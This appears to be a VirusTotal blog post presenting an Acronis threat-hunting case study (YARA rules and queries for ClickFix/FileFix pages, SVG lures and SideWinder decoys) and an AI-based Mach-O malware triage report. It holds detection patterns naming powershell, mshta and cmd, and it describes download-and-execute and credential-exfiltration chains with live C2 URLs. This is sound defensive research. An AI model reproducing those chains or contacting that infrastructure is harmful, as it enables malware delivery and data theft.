Results of our VT Diff session
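The idea of looking for content that repeats across samples can be approximated locally. The sketch below is a simple token intersection, not a reimplementation of VT Diff; the token pattern and the name `shared_tokens` are assumptions made for this example.

```python
import re

# Runs of at least six word-like characters (letters, digits, and URL punctuation)
TOKEN = re.compile(r"[A-Za-z0-9_./:-]{6,}")


def shared_tokens(samples: list[str]) -> set[str]:
    """Return tokens that appear in every sample's text."""
    token_sets = [set(TOKEN.findall(s)) for s in samples]
    return set.intersection(*token_sets) if token_sets else set()
```

Tokens that survive the intersection across many lures are natural candidates for rule strings, while per-sample values such as payload URLs drop out.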
While we could not conclusively attribute the SVG decoy campaign to Blind Eagle at the time of research, the technical and thematic overlaps were difficult to ignore. The VT blog “Uncovering a Colombian Malware Campaign with AI Code Analysis” describes similar judicial-themed SVG files used as lures in operations targeting Colombian users. As with other open reports on this threat actor, attribution remains based on cumulative evidence, clustering campaigns based on commonalities such as infrastructure reuse, phishing template design, malware family selection, and linguistic or regional indicators observed across samples.
rule crimeware_shadow_vector_svg
{

    meta:

        description = "Detects malicious SVG files associated with Shadow Vector's Colombian campaign"
        author = "Acronis Threat Research Unit (TRU)"
        file_type = "SVG"
        malware_family = "Shadow Vector"
        threat_category = "Crimeware / Malicious Image / Embedded Payload"
        tlp = "TLP:CLEAR"

    strings:

        $svg_tag1 = "<?xml" ascii
        $svg_tag2 = "<svg" ascii
        $svg_tag3 = "<!DOCTYPE svg" ascii
        $svg_tag4 = "http://www.w3.org/2000/svg" ascii 

        //used by Shadow Vector (possibly generated in batch)

        $judicial = "juzgado" ascii nocase
        $judicial_1 = "citacion" ascii nocase
        $judicial_2 = "judicial" ascii nocase
        $judicial_3 = "despacho" ascii nocase
        $generado = "Generado" ascii nocase

    condition:

        filesize < 3MB and
        3 of ($svg_tag*) and
        (1 of ($judicial*) and $generado)
}
The evolution from the initial hunting rule to the refined detection rule illustrates our approach to threat hunting in VT: iterative and continuously refined through testing and analysis. The first rule was broad, meant to surface related samples and reveal the full scope of the campaign. It proved useful in livehunt and retrohunt, helping us find clusters of judicial-themed SVGs and their linked payloads. As the investigation progressed, we focused on precision, reducing false positives and removing elements that did not add value. Tuning a rule is always a balance: removing one pattern might miss some samples, but it can also make the rule more accurate and easier to maintain.
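For quick local checks against a folder of samples, the refined rule's condition can be mirrored in a few lines of Python. This is an approximation for triage, assuming whole files fit in memory; `matches_refined_rule` is a hypothetical name and the function is no substitute for running the YARA rule itself.

```python
# Case-sensitive markers, as in the rule's $svg_tag* strings
SVG_TAGS = [b"<?xml", b"<svg", b"<!DOCTYPE svg", b"http://www.w3.org/2000/svg"]
# Case-insensitive terms, as in the rule's $judicial* strings
JUDICIAL = [b"juzgado", b"citacion", b"judicial", b"despacho"]
MAX_SIZE = 3 * 1024 * 1024  # "3MB" in YARA terms


def matches_refined_rule(data: bytes) -> bool:
    """Apply the refined rule's condition to raw file bytes."""
    if len(data) >= MAX_SIZE:
        return False
    lowered = data.lower()
    svg_hits = sum(tag in data for tag in SVG_TAGS)
    has_judicial = any(term in lowered for term in JUDICIAL)
    return svg_hits >= 3 and has_judicial and b"generado" in lowered
```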

FileFix in the wild!

A few weeks ago, the TRU team at Acronis released research on a then rarely seen variant of the ClickFix attack, called FileFix. Much of the investigation of this attack vector was possible thanks to VirusTotal’s ability to archive, search, and write rules for finding web pages. We at Acronis, together with VT, wanted to share a bit of information on how we did it, so that others can better research this type of emerging threat.

Anatomy of an attack: where do we start?

Like many phishing attacks, *Fix attacks rely on malicious websites where victims are tricked into running malicious commands. Luckily for us, these attacks share a few particular components that are common to all, or many, *Fix attacks. Using VT, we were able to write rules and livehunt for any new web pages that included these components, and to quickly iterate on rules that were too broad.
One thing all *Fix attacks have in common is that they copy a malicious command to the victim's clipboard. Copying the command for the victim, rather than letting the user copy it themselves, allows attackers to try to hide the malicious part of the command and let only a smaller, “benign” portion appear when the victim pastes it into the Windows Run dialog or address bar. This commonality gives us two great strings to hunt for:
  • The commands used to copy text into the victim's clipboard
  • The commands used to construct the malicious payload
We began our research by using the Livehunt feature, and wrote a rule to detect navigator.clipboard.writeText and document.execCommand("copy"), both used for copying into clipboard, as well as any string including the words powershell, mshta, cmd, and other commands we find commonly used in *Fix attacks. At its most basic form, a rule might look like this:
import "vt"

rule ClickFix
{
  strings:
    $clipboard = /(navigator\.clipboard\.writeText|document\.execCommand\(\"copy\"\))/
    $pay01 = /(powershell|cmd|mshta|msiexec|pwsh)/i
  condition:
    vt.net.url.new_url and
    $clipboard and
    any of ($pay*)
}  
However, this is far from enough. There are plenty of benign sites that use the copy to clipboard feature, and also have the words powershell or cmd present (the three letters “cmd” appear often as part of Base64 strings). This makes things a bit more tricky, as it requires us to iron out these false positives. We need to make our patterns look more similar to real powershell or cmd commands.
Unfortunately, there is such a huge variance in how these commands are written that the more rigid our patterns became, the more likely we were to miss a true positive that included something we hadn’t seen before or couldn’t think of. This requires a balancing act: if your rules are too rigid, you will miss true positives that employ a creatively crafted command; too loose, and you will receive a large number of false positives, which will slow down the investigation.
For example, we can try narrowing down our rule to catch more true-positive PowerShell commands by searching for a string that better resembles some of the PowerShell commands we’ve seen in ClickFix payloads, by including “iex” (the alias for the Invoke-Expression cmdlet), which tells PowerShell to execute a string as a command:
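The false-positive problem is easy to reproduce locally. The sketch below re-creates the basic rule's two string checks with Python's `re` module and runs them against a benign page whose Base64 data happens to contain "cmd". The `STRICT` pattern is only one hypothetical way of tightening the match (a word boundary plus trailing whitespace), not the pattern used in our rulesets, and the sample pages are made up for illustration.

```python
import re

# Same idea as $clipboard and $pay01 in the basic rule.
CLIPBOARD = re.compile(r'navigator\.clipboard\.writeText|document\.execCommand\("copy"\)')
LOOSE = re.compile(r"powershell|cmd|mshta|msiexec|pwsh", re.IGNORECASE)
# Hypothetical tightening: the keyword must start at a word boundary and be
# followed by whitespace, as it would be in a real command line.
STRICT = re.compile(r"\b(?:powershell|cmd|mshta|msiexec|pwsh)(?:\.exe)?\s", re.IGNORECASE)


def page_matches(page: str, payload_pattern: re.Pattern) -> bool:
    """True when the page has a clipboard write and a payload keyword."""
    return bool(CLIPBOARD.search(page)) and bool(payload_pattern.search(page))


# Benign page: copies a coupon code and embeds an image as Base64 ("...AcmdA...").
benign = 'navigator.clipboard.writeText(code); img.src = "data:image/png;base64,iVBORw0KGgoAAAcmdAAA";'
# Malicious-looking page: copies a PowerShell command line.
malicious = 'navigator.clipboard.writeText("powershell -w hidden -c iex ...");'

for name, page in (("benign", benign), ("malicious", malicious)):
    print(name, page_matches(page, LOOSE), page_matches(page, STRICT))
```

The loose pattern flags both pages, while the stricter one flags only the second. The cost is that a command written without whitespace after the keyword would now be missed.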
$pay03 = /powershell.{,80}iex/
This will match whenever the word powershell appears with the word iex 0 to 80 characters after it. This should reduce the number of false positives we see related to powershell, as it more clearly resembles a powershell command, but at the same time it limits our rule to powershell commands that follow this structure: any true positive command with more than 80 characters between the word powershell and iex, or any command that forgoes iex altogether, will not be caught.
We ended up setting up a number of separate rulesets; some were more specific, others more generic. The more generic ones helped us tune our more specific rulesets. This tactic allowed us to find a large number of ClickFix attacks. Most were run-of-the-mill fake captchas leveraging ClickFix; others were more interesting. As we continued fine-tuning our rules, and within a week of setting up our Livehunt, one of our more generic rules made an interesting detection. At first glance, it appeared to be a false positive, but as we looked closer, we discovered that it was exactly what we were hoping to find: a FileFix attack.
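The behavior of the bounded gap can be checked quickly outside of YARA. Python's `re` module accepts the same `{,80}` quantifier, so the following sketch uses the identical pattern against three made-up command strings (the strings and the `example.invalid` host are placeholders, not samples from the campaign).

```python
import re

# Same pattern as $pay03: "powershell", then at most 80 characters, then "iex".
PAY03 = re.compile(r"powershell.{,80}iex")

near = "powershell -NoProfile -Command iex (irm hxxp://example.invalid/a)"
far = "powershell " + "-x " * 40 + "iex"        # 121 characters between the two words
no_iex = "powershell -EncodedCommand SQBFAFgA"  # never spells out "iex"

for label, command in (("near", near), ("far", far), ("no_iex", no_iex)):
    print(label, bool(PAY03.search(command)))
```

Only the first string matches. The other two are the kinds of true positives this stricter pattern would miss.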

Analyzing payloads

One of the nicest things about researching a *Fix attack is that the payload is right there on the website, in plain sight. This offers a few advantages. The first is that we can examine the payload even when the phishing site itself is down, as long as it’s archived by VT. The second is that we can search for similar patterns via VT queries to try to catch other attacks from the same campaign.
Payloads are visible directly in VT via the content tab of any suspected website (in this case, the payload is obfuscated)
Often, these payloads may contain additional malicious urls which are used to download and execute additional payloads. These can also very easily be examined on VT, and any files they lead to may also be downloaded directly from VT.
In our investigation of the FileFix site, we found that the payload (a powershell command) downloads an image, and then runs a script that is embedded in the image file. That second-stage script then decrypts and extracts an executable from the image and runs it.
FileFix site downloading and extracting code from an image (highlighted)
We were using both a VM and VT to investigate these payloads. One interesting way we were able to use VT is to track additional examples of the malicious images, as parts of the command were embedded as strings in the image file, allowing us to match these patterns via a VT query and find new examples of the attack, or by searching for the file name or the domain which hosts it.
Pivoting on the domain hosting malicious .jpg files, to investigate additional stages of the attack, archived by VT
VT has been extremely helpful in allowing us to very easily analyze malicious URLs used not only for phishing, but also for delivering malware and additional scripts. In some examples, we were able to get quite far along the chain of scripts and payloads without ever having to spin up a VM, just by looking at the content tab, to see what’s inside a particular file. That’s not going to be the case every time, but it’s certainly nice when it does happen.
The malicious images used during the attack contain parts of the malicious code used in the second stage of the attack
By pivoting on specific strings from within that code, we are able to locate other samples of the malicious images and scripts created by the same attacker, and further pivot to uncover their infrastructure
The ability to investigate and correlate various stages, or multiple samples from the same attacker, was a huge boon to us during the investigation. It allowed us to quickly connect the dots without leaving VT, and should be a great asset in your investigation.

Looking for a *Fix

So now that you know all this- what's next? How can this be useful? Well, we hope it can be helpful in a number of ways.
Firstly, working together as a community, it is important that we continue to catch and block URLs that are employing *Fix attacks. It’s not easy to detect a *Fix site dynamically, and prevention may still happen in many cases after the payload has already been run. Maintaining a robust blocklist remains a very good and accessible option for stopping these threats.
Secondly, those of us interested in continuing to track this threat and follow its evolution may use this to find these threats and potentially automate detection. As a side note, *Fix attacks are great investigation topics for those of us starting out in security: as long as appropriate precautions are taken, they can be investigated relatively safely via VT, and they can be very useful for learning about malicious commands, phishing sites, etc.
Thirdly, for those of us protecting organizations, this can be a useful guide for finding these attacks by yourself, in the wild, in order to gain a deeper understanding of how they operate, and what relevant ways you can find to defend your organization, although there are certainly many reports written on the subject which would also come in handy.

VT Tips (based on the success story)

[In the words of VirusTotal…]
The Acronis team’s investigation into FileFix, SideWinder, and ShadowVector is a goldmine of threat hunting techniques. Let’s move beyond the narrative and extract some advanced, practical methods you can apply to your own hunts for web-based threats and multi-stage payloads.

Supercharge Your Web-Content YARA Rules

A simple YARA rule looking for clipboard commands and "powershell" is a good start, but attackers know this. You can significantly improve your detection rate by building rules that look for the context in which these commands appear.
Instead of a generic search, try focusing on the obfuscation and page structure common in these attacks. For instance, attackers often hide their malicious script inside other functions or encoded strings. Your YARA rules can hunt for the combination of a clipboard command and indicators of de-obfuscation functions like atob() (for Base64) or String.fromCharCode.
Combine content searches with URL metadata. The content modifier is also available for URLs: when you set the entity to url, you can use it to search for strings within the URL content. For example, the following query can help identify potential ClickFix URLs by combining some of the findings shared by Acronis with strings commonly used to evade detection.
entity:url (content:"navigator.clipboard.writeText" or content:"document.execCommand(\"copy\")") (content:"String.fromCharCode" or content:"atob")
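If you want to generate variations of this query programmatically, a small builder keeps the quoting consistent. The sketch below is only an illustration: `content_clause`, `build_clickfix_query`, and `search_urls` are hypothetical helper names, and `search_urls` assumes the vt-py client and an API key with access to the `/intelligence/search` endpoint.

```python
def content_clause(*needles: str) -> str:
    """OR together content:"..." terms, escaping embedded double quotes."""
    terms = ['content:"{}"'.format(n.replace('"', '\\"')) for n in needles]
    return "(" + " or ".join(terms) + ")"


def build_clickfix_query() -> str:
    """Rebuild the query shown above from its two groups of indicators."""
    clipboard = content_clause("navigator.clipboard.writeText", 'document.execCommand("copy")')
    deobfuscation = content_clause("String.fromCharCode", "atob")
    return f"entity:url {clipboard} {deobfuscation}"


def search_urls(api_key: str, query: str, limit: int = 20) -> list:
    """Run the query through vt-py and return the IDs of the matching objects."""
    import vt  # imported lazily so the builder can be used without vt-py installed

    with vt.Client(api_key) as client:
        results = client.iterator("/intelligence/search", params={"query": query}, limit=limit)
        return [obj.id for obj in results]


print(build_clickfix_query())
```

Swapping the second clause for other indicators (for example, strings you have seen in a specific kit) gives you a family of related searches without retyping the escaping by hand.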

Dissect Payloads with Advanced Content Queries

When you find a payload, as Acronis did within the FileFix site's source code, your job has just begun. The next step is to find related samples. Attackers often reuse code, and even when they obfuscate their scripts, unique strings or logic patterns can give them away. Isolate unique, non-generic parts of the script. Look for:
  • Custom function names
  • Specific variable names
  • Uncommon comments
  • Unique sequences of commands or API calls
Focus on the unobfuscated parts of the code. In the FileFix payload, the attackers might obfuscate the C2 domain, but the PowerShell command structure used to decode and run it could be consistent across samples. Use that structure as your pivot. For example, if a payload uses a specific combination of [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(...)), you can build a query to find other files using that exact deobfuscation chain.
behavior:"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("
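Once you have matching samples, you will usually want to read what the chain decodes. As a rough Python analogue of `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(...))`, the sketch below decodes a Base64 string as UTF-8; the helper name `decode_like_powershell` and the sample command are ours, used only for illustration.

```python
import base64


def decode_like_powershell(b64_text: str) -> str:
    """Base64-decode the text and interpret the bytes as UTF-8."""
    raw = base64.b64decode(b64_text)
    # errors="replace" keeps the helper usable on partially corrupted blobs.
    return raw.decode("utf-8", errors="replace")


# Harmless stand-in for an encoded second-stage command.
encoded = base64.b64encode("Write-Output 'hello'".encode("utf-8")).decode("ascii")
print(encoded)
print(decode_like_powershell(encoded))
```

Keep in mind that this mirrors the UTF-8 chain specifically. Payloads passed through PowerShell's -EncodedCommand switch are UTF-16LE instead, so they need `decode("utf-16-le")`.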

Don't forget about the infrastructure

Acronis has been tracking SideWinder in a very intelligent way. Their experience with VirusTotal is evident. Most of our users use VirusTotal primarily for file analysis, but sometimes we forget that there are powerful features for tracking infrastructure through livehunt.
In the SideWinder intrusions, there is a continuously monitored hash that corresponds to a decoy file, and this file is downloaded from different URLs.
ITW (in-the-wild) URLs are the URLs that were observed serving the file under study, in this case the RTF decoy file
An interesting way to proactively identify new URLs quickly is by creating a YARA rule in livehunt for URLs, where the objective is to discover new URLs that are downloading that specific RTF decoy file.
import "vt"

rule URLs_Downloading_Decoy_RTF_SideWinder {

  meta:
    target_entity = "url"
    author = "Virustotal"
    description = "This YARA rule identifies new URLs downloading the decoy file related to SideWinder"

  condition:
    vt.net.url.downloaded_file.sha256 == "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a" 
    and vt.net.url.new_url
}
Another approach that could also be interesting is to directly query the itw_urls relationship of the decoy file using the API. One use case could be creating a script that regularly (perhaps daily) calls the relationship API, retrieves the URLs, stores them in a database, and then repeats the call each day to identify new URLs. It's a simple, yet effective way to integrate with technology that any company might already have.
The following code snippet can be executed in Google Colab and once you establish the API Key, you will obtain all the itw_urls related to the decoy file in the all_itw_urls variable.
!pip install vt-py nest_asyncio
import getpass, vt, nest_asyncio
nest_asyncio.apply()  # lets vt-py run inside the notebook's existing event loop

cli = vt.Client(getpass.getpass('Introduce your VirusTotal API key: '))

FILEHASH = "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a"
RELATIONS = "itw_urls"
all_itw_urls = []

# Top-level "async for" works in Colab/IPython; in a plain script, wrap it in an async function
async for itemobj in cli.iterator(f'/files/{FILEHASH}/{RELATIONS}', limit=0):
    all_itw_urls.append(itemobj.to_dict())
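The "store and compare each day" step mentioned above can be sketched with nothing more than SQLite from the Python standard library. The table layout and the `record_new_urls` helper are assumptions made for this example; any database you already run would work the same way.

```python
import sqlite3
from datetime import datetime, timezone


def record_new_urls(conn: sqlite3.Connection, urls: list) -> list:
    """Store the URLs and return only the ones not seen in earlier runs."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS itw_urls (url TEXT PRIMARY KEY, first_seen TEXT NOT NULL)"
    )
    now = datetime.now(timezone.utc).isoformat()
    new_urls = []
    for url in urls:
        cur = conn.execute(
            "INSERT OR IGNORE INTO itw_urls (url, first_seen) VALUES (?, ?)", (url, now)
        )
        if cur.rowcount == 1:  # the row was inserted, so the URL is new
            new_urls.append(url)
    conn.commit()
    return new_urls


# Two simulated daily runs with placeholder URLs.
conn = sqlite3.connect(":memory:")
day1 = record_new_urls(conn, ["http://a.example/x", "http://b.example/y"])
day2 = record_new_urls(conn, ["http://b.example/y", "http://c.example/z"])
print(day1, day2)
```

In practice you would pass in the URL strings extracted from `all_itw_urls` (assuming the usual object layout, something like `item["attributes"]["url"]`) and use a file-backed database instead of `:memory:` so that state survives between runs.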

The great forgotten one: VT Diff

We are always pleased to read research that uses VT Diff, as it is a genuinely useful tool for creating YARA rules.
When analyzing a set of related samples, use the VT Diff feature to spot commonalities and variations. This can help you identify patterns, such as repeated strings, hardcoded values, or metadata artifacts that indicate automated generation.
As the Acronis team notes, "We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (i.e. the string “Generado Automaticamente”)".
You can easily use VT Diff from multiple places: intelligence search results, collections, campaigns, reports, VT Graph…
Creation of VT Diff from a Report

Conclusion

The examples shared by the Acronis Threat Research Unit in tracking campaigns like FileFix, SideWinder, and Shadow Vector demonstrate the power of VT as a comprehensive threat intelligence and hunting platform. By leveraging a combination of proactive Livehunt rules, deep content analysis, and rich metadata pivoting, security researchers can effectively uncover and track elusive and evolving threats.
These examples highlight that successful threat hunting is not just about having the right tools, but about applying creative and persistent investigation techniques. The ability to pivot from a simple YARA rule to a full-fledged campaign analysis, as Acronis did, is crucial to connecting the dots and revealing the full scope of an attack. From hunting for clipboard manipulation in web-based threats to tracking decade-old exploits and analyzing malicious SVG decoys, the Acronis team has demonstrated a deep understanding of modern threat hunting, and we appreciate them sharing their valuable insights with the community.
We hope this blog has been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.
If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us at practitioners@virustotal.com, and we will be happy to feature your story in a future blog post.
Together, we can make the digital world a safer place.

Reversing at Scale: AI-Powered Malware Detection for Apple’s Binaries

6 November 2025 at 22:17

TL;DR: We ran our new AI-based Mach-O analysis pipeline in production, no metadata, no prior detections, just raw Apple binaries. On Oct 18, 2025, out of 9,981 first-seen samples, VT Code Insight surfaced multiple real Mac and iOS malware cases that had 0 antivirus detections at submission time, including a multi-stage AppleScript infostealer and an iOS credential-stealing tweak. It also helped identify 30 antivirus false positives, later confirmed and fixed.

By Bernardo Quintero, Tom Bennett, and Paul Tarter

The Challenge: Reversing at Scale

The long-term goal of Code Insight is ambitious but simple to state: use AI to reason about every single file that reaches VirusTotal in real time. That’s more than two million samples a day, so scalability and efficiency aren’t nice-to-haves, they’re requirements.

We started this journey in early 2023 by analyzing small PowerShell scripts under 25 KB, focusing on fast, context-limited reasoning. As Gemini’s token capacity grew, we expanded support to larger files and richer formats: Office documents with macros, PDFs containing embedded objects, and package types such as NPM, SWF, SVG, MCP, CRX, VSIX, etc. Each step pushed the boundaries of what Code Insight could interpret automatically.

Eventually, we reached compiled binaries, by far the most challenging class due to their size, complexity, and low-level structure. Analyzing native code with large language models is not straightforward: Mach-O binaries can be massive, and full decompilation or disassembly often exceeds even the largest model contexts, while being too slow and expensive for a high-volume production pipeline.

To make this feasible, we built a pruning-based summarization layer. Instead of feeding Gemini a full decompilation or noisy disassembly, we first extract the most informative elements: code entry points, key imports and exports, relevant strings, and selected function summaries, using Binary Ninja’s High Level Intermediate Language (HLIL) for native code. The goal isn’t to reconstruct the full program logic, but to preserve just enough structure for meaningful reasoning.

This distilled representation fits comfortably within Gemini’s 1M-token context window and allows us to generate a concise, human-readable analyst summary in a single LLM call, regardless of the binary’s size. It’s a pragmatic balance between depth and scalability, good enough to reason and perform a fast first-pass triage, yet efficient enough to keep up with the continuous flow of new files reaching VirusTotal every day.
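To illustrate the general idea of pruning under a budget, here is a deliberately simplified Python sketch. It is not the Code Insight pipeline: the `Element` type, the priority values, and the use of character counts as a stand-in for tokens are all assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass
class Element:
    kind: str      # e.g. "entry_point", "import", "string", "function_summary"
    text: str
    priority: int  # lower value = more informative (hypothetical ranking)


def build_summary_input(elements: list, max_chars: int) -> str:
    """Greedily keep the highest-priority elements that fit within the budget."""
    chosen, used = [], 0
    for el in sorted(elements, key=lambda e: e.priority):
        line = f"[{el.kind}] {el.text}"
        cost = len(line) + 1  # +1 for the newline separator
        if used + cost > max_chars:
            continue  # skip what does not fit, keep trying smaller items
        chosen.append(line)
        used += cost
    return "\n".join(chosen)


elements = [
    Element("string", "https://c2.example/gate", 2),
    Element("entry_point", "_main", 0),
    Element("function_summary", "x" * 500, 1),  # too large for the toy budget
    Element("import", "_NSURLSession", 1),
]
print(build_summary_input(elements, max_chars=80))
```

The oversized function summary is dropped while the entry point, import, and string survive, which is the trade-off described above: keep enough structure to reason about, not the whole program.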

The 24-Hour Stress Test

On October 18, 2025, VirusTotal received 9,981 unique Mach-O binaries never seen before by our platform. We ran every single one through our new Code Insight pipeline, using only the raw binary, no external metadata, no crowdsourced intelligence, and no previous antivirus results.

Here’s how the AI’s fully independent analysis compared against the aggregate detections from more than 70 traditional antivirus engines on that same day:

  • Traditional AV Detections: 67 binaries flagged as malicious by one or more engines.
  • Code Insight Detections: 164 binaries identified as malicious.

The absolute numbers are interesting, but the real insight comes from the discrepancies between the two sets.
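Comparing the two sets comes down to simple set arithmetic. The sketch below uses placeholder identifiers rather than real hashes or the actual counts from that day; `compare_verdicts` is a hypothetical helper name.

```python
def compare_verdicts(av_flagged: set, ai_flagged: set) -> dict:
    """Split samples into agreement and the two kinds of disagreement."""
    return {
        "both": av_flagged & ai_flagged,
        "av_only": av_flagged - ai_flagged,  # candidates for antivirus false positives
        "ai_only": ai_flagged - av_flagged,  # candidates for missed detections
    }


# Placeholder sample names, not real data.
av = {"sample_a", "sample_b", "sample_c"}
ai = {"sample_b", "sample_c", "sample_d", "sample_e"}

result = compare_verdicts(av, ai)
for bucket, samples in result.items():
    print(bucket, sorted(samples))
```

The "av_only" and "ai_only" buckets are the ones worth a manual look, since neither side's verdict can be taken at face value there.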

Clearing the Fog: AI as a False Positive Filter

Manual review confirmed that Code Insight’s explanations were accurate:

  • 30 files were false positives from Microsoft’s engine. Once reported, Microsoft promptly reviewed the cases, confirmed the issue, and updated their signatures on October 31. We appreciate their quick response.
  • 3 files were flagged by ClamAV with the signature Macos.Trojan.CrackedTool. While this label is technically correct within ClamAV’s detection policy (it flags software signed by alternative markets such as MacKed), Code Insight correctly identified that these binaries did not exhibit inherently malicious behavior.

In a Security Operations Center setting, even a single false alert like this could consume hours of analyst time before being cleared. While VirusTotal operates at global scale and aggregates samples from many independent sources, the same pattern applies within any organization’s network: unnecessary alerts create noise and drain resources. Code Insight demonstrated how AI reasoning can help triage these cases faster and more consistently, assisting rather than replacing human judgment.

Finding the Needles: Zero-Day Detections

Beyond filtering false positives, Code Insight also surfaced nearly 100 binaries that traditional engines had missed entirely at the time of analysis. Many of these were indeed suspicious, ranging from keygens and adware to grayware utilities with excessive privileges, such as certain developer e-learning tools or Roblox cheats often distributed outside the App Store.

That said, not every “malicious” verdict was black and white. Because Code Insight analyzes binaries in isolation, without context about their surrounding environment or intended use, it can occasionally err on the side of caution. For instance, one MCP component from the Hopper decompiler was described accurately in terms of behavior (persistent XPC communication, JSON-based client–server protocol, API-like command handlers) but was ultimately benign within its legitimate application context, as an MCP server rather than a malicious persistent C2 channel. In this case, we had an accurate technical description but a false positive in the final verdict issued by Code Insight.

These occasional gray-area cases are part of the natural learning curve for AI-based reasoning systems. Still, the vast majority of Code Insight’s findings were technically sound, and its detailed explanations allowed analysts to make quick, informed decisions based on actual capabilities rather than static signatures.

Among those findings, we also identified several clear-cut cases of undetected malware, confirmed through manual reversing and reproducible behavior. Below we highlight two representative examples, one from macOS and another from iOS, both caught by AI yet completely invisible to traditional defenses on Day 0.

1. Multi-stage macOS Dropper (0 Detections)

SHA-256: 9adef73a6255f6bcb203e84cbe9304d000f3c5354d3d7bf3fc3b2a0128b624c3

Code Insight immediately recognized this binary's hostile intent, describing it as a multi-stage threat. It didn't just flag it, it mapped the attack chain:

"The binary is a multi-stage malware that downloads and executes a second-stage AppleScript payload from a C2 server, and exfiltrates local data. It first connects to https://foggydoxz.xyz/dynamic to download an AppleScript, saves it to /tmp/test.scpt, and executes it using /usr/bin/osascript. Subsequently, it reads /tmp/osalogging.zip and exfiltrates it via a POST request to https://foggydoxz.xyz/gate. The malware also bypasses TLS certificate validation to secure its C2 communication."

Manual reversing confirmed not only the verdict but every detail of this AI-generated assessment.
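Because the summary is plain text, its indicators can be pulled out mechanically for pivoting. The following sketch is one possible approach, with regular expressions and helper names (`extract_iocs`, `defang`) of our own choosing; it handles the URL and path shapes seen in the summary above and is not a general-purpose IOC parser.

```python
import re

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Absolute paths with at least one directory; the lookbehind skips URL segments.
PATH_RE = re.compile(r"(?<![\w/:.])/(?:[\w.-]+/)+[\w.-]+")


def extract_iocs(text: str) -> dict:
    """Collect URLs and file paths, trimming sentence punctuation."""
    urls = sorted({u.rstrip(".,;)") for u in URL_RE.findall(text)})
    paths = sorted({p.rstrip(".") for p in PATH_RE.findall(text)})
    return {"urls": urls, "paths": paths}


def defang(url: str) -> str:
    """Make a URL non-clickable before sharing it in a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


summary = (
    "It first connects to https://foggydoxz.xyz/dynamic to download an AppleScript, "
    "saves it to /tmp/test.scpt, and executes it using /usr/bin/osascript. "
    "Subsequently, it reads /tmp/osalogging.zip and exfiltrates it via a POST "
    "request to https://foggydoxz.xyz/gate."
)
iocs = extract_iocs(summary)
print([defang(u) for u in iocs["urls"]])
print(iocs["paths"])
```

The extracted values can then be fed into searches for related samples or network infrastructure.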


The screenshot above shows how detections for this sample evolved on VirusTotal over time. When it first arrived on October 18, no antivirus engine flagged it as malicious, yet Code Insight already identified it as a multi-stage macOS dropper. Over the following days, traditional detections gradually caught up: three engines marked it nine days later, and eleven by October 28. This pattern is common for truly novel threats: AI reasoning can expose suspicious behaviors before signatures or reputation systems are updated, offering analysts an early warning window that would otherwise not exist.

2. iOS Jailbreak Tweak with a Phishing Twist (0 Detections)

SHA-256: 333913409c1e22b5da03c762cbb7d99a9d38ecdf0231cb9ac6db00efc6b3bd97

This sample masquerades as a dynamic library for jailbroken iOS devices, claiming to unlock premium features in Adobe Lightroom. Code Insight looked beyond the piracy functionality and uncovered a secondary payload focused on credential theft.

The AI correctly identified that it used method swizzling / hooking not only to bypass subscription checks but also to inject a fake login prompt. It highlighted obfuscation mechanisms used to conceal the exfiltration channel, including a hardcoded, obfuscated Telegram Bot API token and custom cryptographic routines to hide command strings.

Code Insight’s summary read:

"This is an iOS dynamic library (tweak) for jailbroken devices, designed to be injected into the Adobe Lightroom application process. Its primary purpose is to modify the target application's functionality. It exhibits several malicious behaviors: it uses method swizzling (e.g., `sub_41e564`) to hook functions, displays a custom UI overlay on top of the running application, and employs extensive string obfuscation and custom cryptographic routines (e.g., `sub_433b0c`, `sub_415b68`) to hide its functionality. Key IOCs include the installation path `/Library/MobileSubstrate/DynamicLibraries/Lightroom.dylib` and a URL to a Telegram channel (`https://t[.]me/blatants]`), likely used for C2 or distribution. These characteristics are consistent with malware designed for piracy, credential theft, or phishing within the context of the compromised host application."

A manual reverse-engineering review by an expert confirmed and expanded on the AI’s assessment. The human analysis described the sample as a malicious dynamic library that functions as a dual-purpose tool: (1) it uses method hooking to bypass Lightroom’s premium-feature checks (by replacing subscription validation routines to always return success), and (2) it implements a phishing capability that displays a convincing fake login prompt to capture Adobe credentials. The stolen credentials are then exfiltrated via an obfuscated Telegram Bot API token and Chat ID, with string obfuscation and lightweight crypto used to hide the Telegram URL and tokens. In short: the manual review corroborated the AI’s technical description and confirmed the end-to-end exfiltration mechanism.


The VirusTotal report below shows the status of this sample not only at the time it was first analyzed on October 18, but also as of November 3, more than two weeks later. No antivirus engine has flagged it as malicious to date.

Moreover, on the same day this sample was analyzed, Code Insight detected multiple other binaries using the same injection framework, suggesting an organized campaign rather than an isolated specimen.

Further investigation of the Telegram channel referenced in the IOCs (https://t[.]me/blatants) revealed that it hosts a large-scale operation called Blatant’s iPA Library, boasting more than 38,000 subscribers. The group distributes automation bots (InjectBot, PatchBot, PaidAppScraper, and FileDownloader) that advertise the ability to inject .dylib payloads into iOS .ipa apps, patch premium features, and share modified packages. This infrastructure perfectly matches the behaviors described in the AI-generated report and confirmed through manual reversing: a dual-purpose ecosystem for app piracy and credential theft, powered by Telegram’s bot API.

These examples illustrate both the power and practicality of AI-driven reversing. Even without context or prior knowledge, the model can reason through complex binaries, extract intent, and expose behaviors that remain invisible to static or signature-based methods.

The Pragmatic Reality

This work is not about replacing traditional detection engines, it’s about complementing them and covering their blind spots at a scale human teams simply can’t match.

Until recently, reverse engineering and in-depth code analysis were tasks reserved for human analysts. Even in large-scale operations, fewer than 1% of new files ever underwent that level of scrutiny, simply because manual reversing doesn’t scale. Yet those are precisely the samples that tend to slip past signature or ML-based detections, the truly novel threats.

By autonomously performing this kind of junior-analyst–level reasoning across millions of files daily, VT Code Insight brings that deeper layer of understanding to every new sample, not just the few that would normally reach a human analyst’s desk.

